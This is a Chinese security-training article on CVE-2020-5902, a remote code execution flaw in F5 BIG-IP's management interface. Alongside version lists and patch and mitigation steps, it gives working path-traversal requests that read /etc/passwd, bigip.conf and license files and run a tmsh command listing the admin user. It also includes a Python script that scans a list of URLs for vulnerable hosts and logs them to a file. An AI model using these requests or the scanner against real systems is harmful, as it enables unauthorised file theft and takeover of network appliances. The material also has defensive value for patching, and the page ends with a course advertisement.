网安教育
培养网络安全人才
技术交流、学习咨询
F5 BIG-IP 是美国F5公司一款集成流量管理、DNS、出入站规则、web应用防火墙、web网关、负载均衡等功能的应用交付平台。在 F5 BIG-IP 产品的流量管理用户页面 (TMUI)/配置实用程序的特定页面中存在一处远程代码执行漏洞。
未授权的远程攻击者通过向该页面发送特制的请求包,可以造成任意Java 代码执行。进而控制 F5 BIG-IP 的全部功能,包括但不限于: 执行任意系统命令、开启/禁用服务、创建/删除服务器端文件等。
未授权的远程攻击者通过向该页面发送特制的请求包,可以造成任意Java 代码执行。进而控制 F5 BIG-IP 的全部功能,包括但不限于: 执行任意系统命令、开启/禁用服务、创建/删除服务器端文件等。
tmshCmd
在 tmshCmd 的 service方法处理请求的时候,未对command 参数进行处理,直接调用 WorkspaceUtils.runTmshCommand(cmd, request); 方法执行命令,限制了执行delete,create,list,modify。
1if ("POST".equalsIgnoreCase(request.getMethod())) {
2 String[] cmdArray = command.split(" ");
3 String operation = cmdArray[0];
4 String module = cmdArray[2];
5 if (!ShellCommandValidator.checkForBadShellCharacters(command) && (operation.equals("create") || operation.equals("delete") || operation.equals("list") || operation.equals("modify")) && WHITELISTED_TMSH_MODULES.contains(module)) {
6 try {
7 String[] args = new String[]{command};
8 Result result = Syscall.callElevated(Syscall.TMSH, args);
9 output = result.getOutput();
10 error = result.getError();
11 } catch (CallException var11) {
12 logger.error(NLSEngine.getString("ilx.workspace.error.TmshCommandFailed") + ": " + var11.getMessage());
13 error = var11.getMessage();
14 }
15 } else {
16 error = NLSEngine.getString("ilx.workspace.error.RejectedTmshCommand");
17}
fileRead
在 fileRead 的 service方法处理请求的时候,未对 fileName 参数进行处理,直接调用 WorkspaceUtils.readFile(fileName); 方法,进行文件读取。
fileSave
在 fileSave 的 service方法处理请求的时候,未对 fileName,content 参数进行处理,直接调用 WorkspaceUtils.saveFile(request); 方法,进行文件上传。
BIG-IP 15.x: 15.1.0/15.0.0
BIG-IP 14.x: 14.1.0 ~ 14.1.2
BIG-IP 13.x: 13.1.0 ~ 13.1.3
BIG-IP 12.x: 12.1.0 ~ 12.1.5
BIG-IP 11.x: 11.6.1 ~ 11.6.5
1curl -v -k 'https://[F5 Host]/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd'
2
3https://<IP>/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd
4
5https://<IP>/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/hosts
6
7https://<IP>/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/config/bigip.license
8
9https://<IP>/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/config/bigip.conf
1curl -v -k 'https://[F5 Host]/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=list+auth+user+admin'
脚本代码,采用python3编写,也可以去github下载
1import requests
2from random import choice
3import argparse
4import json
5
6import warnings
7warnings.filterwarnings('ignore')#忽略SSL警告
8
9USER_AGENTS = [
10 "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; AcooBrowser; .NET CLR 1.1.4322; .NET CLR 2.0.50727)",
11 "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Acoo Browser; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)",
12 "Mozilla/4.0 (compatible; MSIE 7.0; AOL 9.5; AOLBuild 4337.35; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)",
13 "Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)",
14 "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET CLR 2.0.50727; Media Center PC 6.0)",
15 "Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET CLR 1.0.3705; .NET CLR 1.1.4322)",
16 "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.2; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.04506.30)",
17 "Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN) AppleWebKit/523.15 (KHTML, like Gecko, Safari/419.3) Arora/0.3 (Change: 287 c9dfb30)",
18 "Mozilla/5.0 (X11; U; Linux; en-US) AppleWebKit/527+ (KHTML, like Gecko, Safari/419.3) Arora/0.6",
19 "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.2pre) Gecko/20070215 K-Ninja/2.1.1",
20 "Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.9) Gecko/20080705 Firefox/3.0 Kapiko/3.0",
21 "Mozilla/5.0 (X11; Linux i686; U;) Gecko/20070322 Kazehakase/0.4.5",
22 "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.8) Gecko Fedora/1.9.0.8-1.fc10 Kazehakase/0.5.6",
23 "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.56 Safari/535.11",
24 "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_3) AppleWebKit/535.20 (KHTML, like Gecko) Chrome/19.0.1036.7 Safari/535.20",
25 "Opera/9.80 (Macintosh; Intel Mac OS X 10.6.8; U; fr) Presto/2.9.168 Version/11.52",
26 "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/536.11 (KHTML, like Gecko) Chrome/20.0.1132.11 TaoBrowser/2.0 Safari/536.11",
27 "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/21.0.1180.71 Safari/537.1 LBBROWSER",
28 "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; LBBROWSER)",
29 "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; QQDownload 732; .NET4.0C; .NET4.0E; LBBROWSER)",
30 "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.84 Safari/535.11 LBBROWSER",
31 "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)",
32 "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; QQBrowser/7.0.3698.400)",
33 "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; QQDownload 732; .NET4.0C; .NET4.0E)",
34 "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; SV1; QQDownload 732; .NET4.0C; .NET4.0E; 360SE)",
35 "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; QQDownload 732; .NET4.0C; .NET4.0E)",
36 "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)",
37 "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/21.0.1180.89 Safari/537.1",
38 "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/21.0.1180.89 Safari/537.1",
39 "Mozilla/5.0 (iPad; U; CPU OS 4_2_1 like Mac OS X; zh-cn) AppleWebKit/533.17.9 (KHTML, like Gecko) Version/5.0.2 Mobile/8C148 Safari/6533.18.5",
40 "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:2.0b13pre) Gecko/20110307 Firefox/4.0b13pre",
41 "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:16.0) Gecko/20100101 Firefox/16.0",
42 "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.11 (KHTML, like Gecko) Chrome/23.0.1271.64 Safari/537.11",
43 "Mozilla/5.0 (X11; U; Linux x86_64; zh-CN; rv:1.9.2.10) Gecko/20100922 Ubuntu/10.10 (maverick) Firefox/3.6.10"
44]
45
46headers = {}
47
48def F5(url, i):
49 #print(f'[{i}]')
50 checkUrl = url + '/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd'
51 headers["User-Agent"] = choice(USER_AGENTS)
52 try:
53 res = requests.get(checkUrl, headers=headers,timeout=3,verify=False)
54 print(res.status_code)
55 if res.status_code is 200:
56 print('[{i} +++] The {url} has Vuln !!!!!!!!!!!!'.format(url=url,i=i)+'n')
57 with open('success.txt', 'a') as f1:
58 f1.write(url + 'n')
59 else:
60 print('[{i} xxx] The {url} Not has Vuln'.format(url=url,i=i)+'n')
61 except:
62 print("{url} 连接超时n".format(url=url))
63
64def get_url():
65 i = 1
66 with open('urls.txt', 'r') as f:
67 for line in f:
68 url = line.replace('n', '')
69 if url[0:5] == 'https':
70 url = url
71 else:
72 url = 'https://' + url
73 F5(url, i)
74 i += 1
75if __name__ == '__main__':
76 get_url()
通用修补建议:
升级到以下版本
BIG-IP 15.x: 15.1.0.4
BIG-IP 14.x: 14.1.2.6
BIG-IP 13.x: 13.1.3.4
BIG-IP 12.x: 12.1.5.2
BIG-IP 11.x: 11.6.5.2
临时修补建议:
官方建议可以通过以下步骤临时缓解影响
1) 使用以下命令登录对应系统
1tmsh
2) 编辑 httpd 组件的配置文件
1edit /sys httpd all-properties
3) 文件内容如下
1include '
2<LocationMatch ".*..;.*">
3Redirect 404 /
4</LocationMatch>
5'
4) 按照如下操作保存文件
1按下 ESC 并依次输入
2:wq
5) 执行命令刷新配置文件
1save /sys config
6) 重启 httpd 服务
1restart sys service httpd
并禁止外部IP对 TMUI 页面的访问
Article: K52145254 – TMUI RCE vulnerability CVE-2020-5902
BIG-IP 应用程序服务、硬件和软件 | F5
Add F5 BIG-IP TMUI Directory Traversal and File Upload RCE (CVE-2020-5902)
CVE-2020-5902
战疫期间,开源聚合网络安全基础班、实战班线上全面开启,学网络安全技术、升职加薪……有兴趣的可以加入开源聚合网安大家庭,一起学习、一起成长,考证书求职加分、升级加薪,有兴趣的可以咨询客服小姐姐哦!
加QQ(1271375291)找小姐姐私聊哦
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论